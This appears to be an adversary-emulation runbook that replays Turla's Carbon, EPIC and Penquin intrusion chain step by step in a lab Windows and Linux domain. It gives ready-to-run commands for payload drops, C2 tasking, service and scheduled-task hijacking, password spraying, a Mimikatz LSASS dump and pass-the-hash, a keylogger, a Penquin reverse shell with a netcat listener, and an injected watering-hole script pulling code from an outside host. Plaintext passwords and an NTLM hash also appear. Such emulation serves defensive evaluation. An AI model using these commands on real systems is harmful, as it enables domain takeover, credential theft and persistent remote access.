# Carbon Protections Scenario

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something

# Protections Setup

➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33).

  • Open a new terminal window, cd to the cloned repo control server, and start the control server:
cd /opt/day1/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day1.yml
  • Within your Kali control server terminal window, right click and select "Split Terminal Horizontally". Be careful not to terminate the control server.

  • In the new terminal window, change directory to the control server repo:

cd /opt/day1/turla/Resources/control_server
  • Ensure that the Carbon and EPIC handlers started up.

# Test 1: Initial Access via Spearphishing Link

🎤 Voice Track:

Test 1 emulates Turla gaining initial access via a spearphishing link sent in an email to the user Gunter.

The link initiates the download of a fake software update executable named NTFVersion.exe.


# ☣️ Procedures

➡️ RDP to hobgoblin (10.20.20.102) as Gunter:

Username Password
skt\Gunter Password1!
  • Open Microsoft Edge, declining all first-run options, and browse to https://brieftragerin.skt.local/owa. Login:
Username Password
skt\Gunter Password1!
  • Open the email from noreply@sktlocal.it and click the link in the email to initiate the download of NTFVersion.exe. DO NOT EXECUTE THE FILE.

  • Open File Explorer and browse to Downloads

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 2: EPIC and Carbon on Workstation

🎤 Voice Track:

Test 2 emulates user execution of the EPIC dropper, execution of the EPIC injector via the Winlogon shell registry key value, and execution of the Carbon installer.


# ☣️ Procedures

➡️ Open up a new terminal tab in your Kali machine using Ctrl+Shift+T, name this tab "smbclient" and copy the EPIC injector to the Windows host hobgoblin:

cd /opt/day1/turla/Resources/EPIC/SimpleDropper/SimpleDropper/bin/
smbclient -U 'skt.local\Frieda'%'Password3!' //10.20.20.102/C$ -c 'put SimpleDropper_http.exe Users\Gunter\Downloads\NTFVersion.exe'

➡️ Return to your RDP to hobgoblin. Open File Explorer and browse to Gunter's Downloads folder.

  • Double click and run NTFVersion.exe

Wait 1 minute then close out of all tabs and sign out of the RDP session to hobgoblin as Gunter.

➡️ Re-RDP to hobgoblin (10.20.20.102) as Gunter:

Username Password
skt\Gunter Password1!
  • Open Microsoft Edge and browse to https://brieftragerin.skt.local/owa.

➡️ Set a timer for 2 minutes then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.

NOTE: The injector will wait 2 minutes, before injecting EPIC's Guard DLL into explorer.exe and, subsequently, EPIC's worker DLL into Microsoft Edge.

  • Within your Kali control server terminal window, right click and select "Split Terminal Horizontally". Be careful not to terminate the control server.

  • In your lower terminal tab, copy and paste the first set of discovery commands:

cd /opt/day1/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | net group "Domain Admins" /domain && net group "Domain Computers" /domain && net group "Domain Controllers" /domain && tasklist /svc'
  • Verify that the ViperVPNSvc service shows up in the tasklist output towards the end.
grep 'ViperVPNSvc' logs.txt -i
  • This should return:
  •     >viperVpn.exe                  <PID> ViperVPNSvc
        >```
    
  • Wait for the command to return before tasking the next command to query the service and who can access it:
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | reg query HKLM\SYSTEM\CurrentControlSet\Services\ViperVPNSvc && powershell "$(Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\ViperVPNSvc).Access"'
  • Wait for the command to return before tasking EPIC to modify the misconfigured ViperVPNSvc service to use our implant to execute:
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | reg add "HKLM\system\currentcontrolset\services\ViperVPNSvc" /t REG_EXPAND_SZ /v ImagePath /d "cmd.exe /c %TEMP%\mxs_installer.exe" /f'
  • Wait for the command to return.

➡️ Minimize (do not close) the hobgoblin RDP window.

➡️ RDP into bannik (10.20.10.9), as Frieda:

Username Password
skt\Frieda Password3!
  • Close any spurious windows.

  • Open up an administrative Powershell session and run the following commands to remotely restart the service:

sc.exe \\hobgoblin stop ViperVPNSvc
sc.exe \\hobgoblin start ViperVPNSvc

ℹ️ Starting the ViperVPN service should take at least 30 seconds and eventually result in an error [SC] StartService FAILED 1053. The EPIC injector will wait an additional 2 minutes before performing injection. If the [SC] StartService FAILED 1053 error occurs in less than 10 seconds and/or you don't receive a new session, contact your Evals lead.

  • Wait for the command to return and then sign out of your RDP session to bannik as Frieda

➡️ Switch to your Kali attack station and confirm that a new elevated implant has registered.

➡️ Switch back to your Kali terminal and task the SYSTEM level EPIC implant to download the CARBON-DLL installer:

./evalsC2client.py --set-task 51515228-8a7b-4226-e6e3f4 'name | C:\Windows\System32\WinResSvc.exe | dropper.exe'
  • Wait for the command to return and then task the EPIC implant to execute the CARBON-DLL installer:
./evalsC2client.py --set-task 51515228-8a7b-4226-e6e3f4 'exe | C:\Windows\System32\WinResSvc.exe'
  • CARBON-DLL should inject into the Microsoft Edge process and beacon back to the C2 server. Check that there is a new Carbon implant session registered with the C2 server

  • Wait for the command to return and then task the Carbon implant to execute some discovery commands:

./evalsC2client.py --set-task 9b5ef515 '{"id": 0, "cmd": "whoami"}'

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 3: Password Spray

🎤 Voice Track:

Test 3 emulates Turla laterally moving to the domain controller by conducting password spraying via a batch script to retrieve a domain admin's credentials to the domain controller. The batch script sprays several of the discovered domain admin accounts with weak passwords, one of which successfully mounts the C:\ drive of the domain controller.


# ☣️ Procedures

➡️ From the "smbclient" tab on the Kali Linux machine, copy the password spray script to hobgoblin:

cd /opt/day1/turla/Resources/payloads/carbon/
smbclient -U 'skt.local\frieda'%'Password3!' //10.20.20.102/C$ -c 'put password_spray.bat Users\Public\winsas64.bat'

➡️ Return to your RDP session to hobgoblin as Gunter.

➡️ Open a Windows Command Prompt and execute the password spray script.

"C:\Users\Public\winsas64.bat"

Verify that the script successfully sprays Frieda's password by checking that output matches the following:

The command completed successfully.

frieda:Password3! SUCCESS

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 4: Carbon on Domain Controller

🎤 Voice Track:

Test 4 emulates execution of CARBON-DLL on the domain controller via scheduled task.


# ☣️ Procedures

➡️ From the "smbclient" tab on the Kali Linux machine, copy the Carbon installer executable to Windows host, hobgoblin.

cd /opt/day1/turla/Resources/payloads/carbon/
smbclient -U 'skt.local\frieda'%'Password3!' //10.20.20.102/C$ -c 'put carbon_installer_2.exe Windows\System32\wmimetricsq.exe'

➡️ Return to your RDP session to hobgoblin (10.20.20.102) as Gunter.

  • Open File Explorer and browse to C:\Windows\System32. Order the files by date.

  • Open an Admin Command Prompt. Use the following credentials if prompted:

Username Password
skt\frieda Password3!

➡️ Minimize the RDP session to hobgoblin and start a new RDP session to bannik (10.20.10.9) as Frieda:

Username Password
skt\Frieda Password3!
  • Open Microsoft Edge.

➡️ Return to your RDP session to hobgoblin (10.20.20.102) and from the Admin Command Prompt, copy the 2nd Carbon installer to bannik (10.20.10.9):

move C:\Windows\System32\wmimetricsq.exe \\bannik\C$\Windows\System32

➡️ In your RDP session to bannik (10.20.10.9), open File Explorer and browse to C:\Windows\System32. Order the files by date.

➡️ Return to your RDP session to hobgoblin (10.20.20.102).

  • From the Admin Command Prompt, execute the following to enumerate schtasks on the domain controller:
schtasks /query /S bannik /U skt\Frieda /P Password3!
  • Verify that \Microsoft\Windows\Customer Experience Improvement Program\Consolidator task appears in the output.
    • In the Command Prompt, press CTRL+F and in the "Find what:" field, enter Customer Experience Improvement Program
    • The output should contain:
  • Folder: \Microsoft\Windows\Customer Experience Improvement Program
    TaskName                                 Next Run Time          Status         
    ======================================== ====================== ===============
    Consolidator                             2/24/2023 12:00:00 AM  Ready          
    UsbCeip                                  N/A                    Ready      
  • Wait for the command to return and then modify a scheduled task using the discovered password for the domain admin Frieda (https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a).

schtasks /Change /S bannik /U skt\Frieda /P Password3! /TN "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /TR %SystemRoot%\System32\wmimetricsq.exe
  • Wait for the command to return and then start the modified scheduled task on the domain controller.
schtasks /Run /S bannik /U skt\Frieda /P Password3! /TN "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /I

➡️ Return to your RDP session to bannik.

  • Open File Explorer and browse to C:\Program Files\Windows NT\2028. Validate the existence of a dsntport.dat file. The log file should be growing every ~20 seconds.

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 5: Mimikatz and PsExec of 3rd Carbon Installer

🎤 Voice Track:

Test 5 emulates Turla downloading and executing Mimikatz as terabox.exe in order to perform lateral movement to a second workstation in the domain.


# ☣️ Procedures

➡️ From the "smbclient" tab on the Kali Linux machine, copy over Mimikatz to bannik (10.20.10.9):

cd /opt/day1/turla/Resources/payloads/carbon
smbclient -U 'skt.local\frieda'%'Password3!' //10.20.10.9/C$ -c 'put mimikatz.exe Windows\System32\terabox.exe'

➡️ Return to your RDP session to bannik (10.20.10.9) as Frieda.

  • Open File Explorer and browse to C:\Windows\System32. Order the files by date.

  • Open an elevated Windows Command Prompt and execute the following command to dump LSASS:

NOTE: This command varies slightly from the Detections scenario with the addition of privilege::debug since we are not executing from SYSTEM context.

C:\Windows\System32\terabox.exe "pr::d" "lsdu::go /ynot" "quit"
  • Verify that the NTLM hash for adalwolfa is included in the output.
    • In the Command Prompt, press CTRL+F and in the "Find what:" field, enter NTLM : 07d128430a6338f8d537f6b3ae1dc136
    • The output should contain:
  • RID  : 00000456 (1110)
    User : Adalwolfa
    
    * Primary
        NTLM : 07d128430a6338f8d537f6b3ae1dc136
        LM   : 
    Hash NTLM: 07d128430a6338f8d537f6b3ae1dc136
        ntlm- 0: 07d128430a6338f8d537f6b3ae1dc136
        lm  - 0: 95b8536c32208871930216e62d5e12d4

➡️ From the "smbclient" tab on the Kali Linux machine, copy over PsExec and the 3rd Carbon installer to bannik (10.20.10.9):

smbclient -U 'skt.local\frieda'%'Password3!' //10.20.10.9/C$ -c 'put PsExec.exe Windows\System32\wsqsp.exe'
smbclient -U 'skt.local\frieda'%'Password3!' //10.20.10.9/C$ -c 'put carbon_installer_3.exe Windows\System32\wsqmanager.exe'

➡️ Return to your RDP session to bannik (10.20.10.9) as Frieda.

  • Return to the File Explorer window in System32.

  • ➡️ Minimize (do not close) the RDP window. Start a new RDP session to khabibulin (10.20.20.104) as adalwolfa:

Username Password
skt\adalwolfa Password2!
  • Close any spurious windows

  • Open up Edge, but don't browse to any website just yet. The browser process is needed for Carbon comms lib DLL injection to occur.

➡️ Minimize (do not close) the khabibulin (10.20.20.104) RDP window and return to the RDP session to bannik (10.20.10.9).

  • From the existing elevated Windows Command Prompt, execute Mimikatz Pass-the-Hash with PsExec to execute the 3rd Carbon installer on khabibulin (10.20.20.104):
C:\Windows\System32\terabox.exe "pr::d" "slsa::htp /user:adalwolfa /domain:skt /ntlm:07d128430a6338f8d537f6b3ae1dc136 /remotepc:khabibulin /pexe:C:\Windows\System32\wsqsp.exe /sys:1 /prun:C:\Windows\System32\wsqmanager.exe" "quit"

Verify that a new Carbon implant has been registered with the control server.

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 6: Keylogger

🎤 Voice Track:

Test 6 emulates Turla installing a custom keylogger (wingtsvcupdt.exe) on Adalwolfa's workstation and harvesting credentials from the system.


# ☣️ Procedures

➡️ Start a new RDP session to khabibulin (10.20.20.104) as adalwolfa (if no existing RDP from a previous test):

Username Password
skt\adalwolfa Password2!

➡️ From the "smbclient" tab on the Kali Linux machine, copy over the keylogger to khabibulin (10.20.20.104):

smbclient -U 'skt.local\adalwolfa'%'Password2!' //10.20.20.104/C$ -c 'put keylogger.exe Windows\Temp\wingtsvcupdt.exe'

➡️ Return to your RDP session to khabibulin (10.20.20.104) as adalwolfa.

  • Open an elevated Windows Command Prompt and execute the following command to start the keylogger:
C:\Windows\Temp\wingtsvcupdt.exe
  • NOTE: This should hang the terminal with the following output:
  •     >Monitoring window information...
        >Set hooks
        >```
    
  • Simulate activity as Adalwolfa:

    • Minimize the elevated Windows Command Prompt
    • Open Edge.
    • Open a new non-admin PowerShell terminal
      • Type do not copy the SSH command: ssh adalwolfa@10.20.10.23
      • Type do not copy the SSH password Password2! when prompted.
      • Within the SSH session, type do not copy the follow commands as Adalwolfa:
        1. sudo nano /var/www/html/index.html
        2. Go to line 198 with CTRL + SHIFT + - then type 198
        3. Replace Apache2 Ubuntu Default Page with Adalwolfa's Page
        4. save the file with CTRL + X, Y, enter
        5. Type exit to exit from the SSH session
  • From the elevated Windows Command Prompt, CTRL + C to kill the keylogger

  • Execute the following command to output the data written to the keylogger file:

type %temp%\\~DFA512.tmp

Verify that the keystrokes were logged containing the website information and Adalwolfa's SSH credentials.

# 🗿 Source Code

# 🔬 Cited Intelligence


# Test 7: Penquin

🎤 Voice Track:

Test 7 emulates Turla laterally moving to the Linux Apache server and installing Penquin. Once Penquin's sniffer has been installed, a magic packet is sent to the Apache server, from which the sniffer component of Penquin parses the IP address to connect to, and triggers the establishment of a reverse shell.


# ☣️ Procedures

➡️ From the "smbclient" tab on the Kali Linux machine, copy over Penquin and pscp.exe to khabibulin (10.20.20.104):

smbclient -U 'skt.local\adalwolfa'%'Password2!' //10.20.20.104/C$ -c 'put hsperfdata.zip Windows\Temp\tmp504e.tmp'
smbclient -U 'skt.local\adalwolfa'%'Password2!' //10.20.20.104/C$ -c 'put pscp.exe Windows\System32\pscp.exe'

➡️ Switch to your RDP session to khabibulin (10.20.20.104) or, if one was not opened from a previous step, open a new RDP session to khabibulin (10.20.20.104) as adalwolfa:

Username Password
skt\adalwolfa Password2!
  • Open File Explorer and browse to C:\Windows\System32

  • Open an elevated Windows Command Prompt (if no existing admin prompt from a previous step)

  • Use the elevated Windows Command Prompt to copy Penquin to the Apache web server using Adalwolfa's credentials.

echo y | C:\Windows\System32\pscp.exe -pw Password2! C:\Windows\Temp\tmp504e.tmp adalwolfa@10.20.10.23:/tmp/tmp514f524f

➡️ From the "smbclient" tab on the Kali Linux machine, copy over plink.exe to khabibulin (10.20.20.104):

smbclient -U 'skt.local\adalwolfa'%'Password2!' //10.20.20.104/C$ -c 'put plink.exe Windows\System32\plink.exe'

➡️ Return to your RDP session to khabibulin (10.20.20.104) as adalwolfa.

  • Return to the File Explorer window in System32.

  • Return to the elevated Windows Command Prompt to execute Penquin (Penquin takes ~8 seconds to execute).

(echo unzip /tmp/tmp514f524f -d /tmp & echo sudo mv /tmp/hsperfdata /root/hsperfdata & echo sudo /root/hsperfdata & echo exit) | C:\Windows\System32\plink.exe -ssh -l adalwolfa -pw Password2! 10.20.10.23
  • Wait for the command to return.

  • ➡️ From your Kali Linux machine, open a new terminal tab using Ctrl+Shift+T. Rename the new tab to Penquin NC

  • In the new tab, set up a Netcat listener for Penquin's reverse shell to connect to:

nc -lvvp 8081
  • Open up another terminal tab and name this one to Packet Sender. Run the following commands to send the magic packet to the Apache server using the sendPacket.py utility.
cd /opt/day1/turla
sudo -E python3 Resources/Penquin/sendPacket.py --handler_ip 176.59.15.33 --handler_port 8081 --target_ip 10.20.10.23 --target_port 8080 --payload_type base64
  • Wait a few seconds and then check the Netcat tab (Penquin NC). The Netcat prompt should report a successful connection.

  • In the terminal where the reverse shell has connected to the Netcat listener, paste the following command to add the watering hole redirection to index.html:

echo "<script>if (document.getElementById('xyz')) {{}} else {{ var gam = document.createElement('script'); gam.type = 'text/javascript'; gam.async = true; gam.src = ('http://anto-int.com/counter.js'); var sm = document.getElementsByTagName('script')[0]; sm.parentNode.insertBefore(gam, sm); var fl = document.createElement('span'); fl.id = 'xyz'; var d =  document.getElementsByTagName('div')[0]; d.parentNode.insertBefore(fl, d);}}</script>" >> /var/www/html/index.html
  • Wait 1 minute and then send the following command to close the reverse shell
exit

# 🗿 Source Code

# 🔬 Cited Intelligence